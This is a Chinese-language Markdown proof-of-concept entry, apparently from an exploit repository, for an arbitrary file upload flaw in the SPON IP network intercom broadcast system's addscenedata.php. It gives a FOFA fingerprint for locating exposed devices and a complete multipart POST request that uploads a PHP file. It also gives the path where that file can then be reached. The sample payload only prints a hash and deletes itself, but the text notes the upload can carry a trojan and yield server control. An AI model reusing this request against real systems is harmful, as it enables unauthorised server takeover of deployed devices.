POC/wpoc/世邦通信/世邦通信SPON-IP网络对讲广播系统addscenedata.php任意文件上传漏洞.md

34 lines
1.1 KiB
Markdown
Raw Normal View History

2025-03-04 23:12:57 +08:00
## 世邦通信SPON-IP网络对讲广播系统addscenedata.php任意文件上传漏洞
世邦通信 SPON IP网络对讲广播系统 addscenedata.php 存在任意文件上传漏洞,攻击者可以通过漏洞上传任意文件甚至木马文件,从而获取服务器权限。
## fofa
```
icon_hash="-1830859634"
```
## poc
```
POST /php/addscenedata.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 279
Content-Type: multipart/form-data; boundary=b0b0dcc3da2dd47434dfbafd7be4c6d5965a5bf03b1e9affc7e72eea848b
Accept-Encoding: gzip, deflate, br
Connection: close
--b0b0dcc3da2dd47434dfbafd7be4c6d5965a5bf03b1e9affc7e72eea848b
Content-Disposition: form-data; name="upload"; filename="test.php"
Content-Type: application/octet-stream
<?php echo md5(1);unlink(__FILE__);?>
--b0b0dcc3da2dd47434dfbafd7be4c6d5965a5bf03b1e9affc7e72eea848b--
```
![image-20240613135537911](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202406131355980.png)
文件路径`http://127.0.0.1/images/scene/test.php`